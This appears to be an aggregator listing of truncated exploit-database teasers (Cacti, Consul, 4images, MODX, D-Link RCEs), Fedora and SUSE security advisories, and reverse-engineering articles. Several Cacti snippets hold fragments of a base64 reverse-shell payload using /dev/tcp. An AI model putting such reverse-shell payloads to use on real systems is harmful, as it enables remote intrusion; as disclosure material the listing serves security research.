Judging Management System v1.0 - Remote Code Execution Exploit

Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0...

Cacti v1.2.22 - Remote Command Execution Exploit

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

Cacti 1.2.22 Remote Command Execution

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

[SECURITY] Fedora 38 Update: cutter-re-2.2.0-1.fc38

Cutter is a Qt and C++ GUI for Rizin. Its goal is making an advanced, customizable and FOSS reverse-engineering platform while keeping the user experience at mind. Cutter is created by reverse engineers for reverse engineers...

[SECURITY] Fedora 38 Update: rizin-0.5.1-1.fc38.2

Rizin is a free and open-source Reverse Engineering framework, providing a complete binary analysis experience with features like Disassembler, Hexadecimal editor, Emulation, Binary inspection, Debugger, and more. Rizin is a fork of radare2 with a focus on usability, working features and co de...

4images 1.9 - Remote Command Execution Vulnerability

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

Fedora: Security Advisory for cutter-re (FEDORA-2023-af305bed3d)

The remote host is missing an update for the SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

SUSE SLES15 Security Update : tomcat (SUSE-SU-2023:1669-1)

The remote SUSE Linux SLES15 / SLESSAP15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2023:1669-1 advisory. - When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https,...

4images 1.9 - Remote Command Execution (RCE)

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

Fedora: Security Advisory for rizin (FEDORA-2023-af305bed3d)

The remote host is missing an update for the SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

4 Steps to Creating a Powerful Research Lab for Reverse Engineering

However, manual lab setup and configuration can prove to be a laborious and time-consuming process. In this article, we'll look at 4 ways to create a reverse engineering lab, discuss how to save time, and, potentially, improve the detection rate using a sandbox-as-a-service, and a recommended lis...

4 Steps to Creating a Powerful Research Lab for Reverse Engineering

However, manual lab setup and configuration can prove to be a laborious and time-consuming process. In this article, we'll look at 4 ways to create a reverse engineering lab, discuss how to save time, and, potentially, improve the detection rate using a sandbox-as-a-service, and a recommended lis...

Apk.Sh - Makes Reverse Engineering Android Apps Easier, Automating Some Repetitive Tasks Like Pulling, Decoding, Rebuilding And Patching An APK

apk.sh is a Bash script that makes reverse engineering Android apps easier, automating some repetitive tasks like pulling, decoding, rebuilding and patching an APK. Features apk.sh basically uses apktool to disassemble, decode and rebuild resources and some bash to automate the frida gadget...

Fedora 38 : cutter-re / rizin (2023-af305bed3d)

The remote Fedora 38 host has packages installed that are affected by multiple vulnerabilities as referenced in the FEDORA-2023-af305bed3d advisory. rebase rizin to v0.5.1 and cutter-re to 0.2.0 Tenable has extracted the preceding description block directly from the Fedora security advisory. Note...

Exploit for Race Condition in Canonical Ubuntu_Linux

This repository is a proof-of-concept PoC for the Dirty COW CVE-2016-5195 vulnerability. The PoC relies on ptrace to patch the vDSO Virtual Dynamic Shared Object instead of modifying filesystem binaries. This approach has several advantages, including no setuid binary required, SELinux bypass,...

Hashicorp Consul v1.0 - Remote Command Execution Exploit

Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution RCE Exploit Author: GatoGamer1155, 0bfxgh0st Vendor Homepage: https://www.consul.io/ Description: Exploit for gain reverse shell on Remote Command Execution via API References: https://www.consul.io/api/agent/service.html Tested on:...

Hashicorp Consul 1.0 Remote Command Execution

Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution RCE Date: 26/10/2022 Exploit Author: GatoGamer1155, 0bfxgh0st Vendor Homepage: https://www.consul.io/ Description: Exploit for gain reverse shell on Remote Command Execution via API References:...

Hashicorp Consul v1.0 - Remote Command Execution (RCE)

Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution RCE Date: 26/10/2022 Exploit Author: GatoGamer1155, 0bfxgh0st Vendor Homepage: https://www.consul.io/ Description: Exploit for gain reverse shell on Remote Command Execution via API References:...

D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution Exploit

Exploit Title: D-Link DNR-322L Exploit Writeup: https://lukasec.ch/posts/dlinkdnr322.html Vendor Homepage: https://dlink.com Vendor Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10305 Software Link: http://legacyfiles.us.dlink.com/DNR-322L/REVA/FIRMWARE...

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution Vulnerability

Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution Exploit Author: Sarang Tumne @CyberInsane Twitter: @thecyberinsane CVE ID: CVE-2022-26149 Confirmed on release 2.8.3-pl Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt Vendor:...